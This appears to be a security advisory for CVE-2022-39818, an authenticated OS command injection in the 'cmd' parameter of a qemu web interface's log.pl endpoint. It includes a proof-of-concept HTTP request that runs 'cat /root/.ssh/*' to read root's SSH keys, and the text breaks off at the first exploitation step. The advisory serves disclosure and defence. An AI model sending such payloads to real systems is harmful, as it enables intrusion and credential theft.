Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') – CWE-78
Software Version: R19.9
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39818
CVSv3: 8.8
Severity: High
Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli
The Web application does not properly check the parameters sent as input before they are processed on the server side. This allows any authenticated user to execute commands on the Operating System.
Step-by-step instructions and PoC
The Web application, and to be more precise the module that manages the VM element (qemu Webui), does not properly check the parameters sent as input before they are processed on the server. Due to the lack of validation of user input, that allows an attacker to replace and inject arbitrary system commands with the root privileges of the application user.
Affected Endpoints
· URL: https://[...]/cgi-bin/R19.9/log.pl
Parameter:
· HTTP GET: cmd
Below are the evidences with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:
GET /cgi-bin/R19.9/log.pl?go=OK&bench=KALEVO19&c=22SHOWCA&runfrom=/var/autoinstall/R19.9&cmd=cat%20/root/.ssh/* HTTP/1.1
Host: [...]
Cookie: XSRF=618627
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept-Encoding: gzip, deflate
Authorization: Basic [...]
Referer: https://[...]/cgi-bin/R19.9/actions.pl?session=KALEVO19
Connection: close
This first step consists of replacing the command in the “cmd” GET parameter whit the chosen one to execute the command:
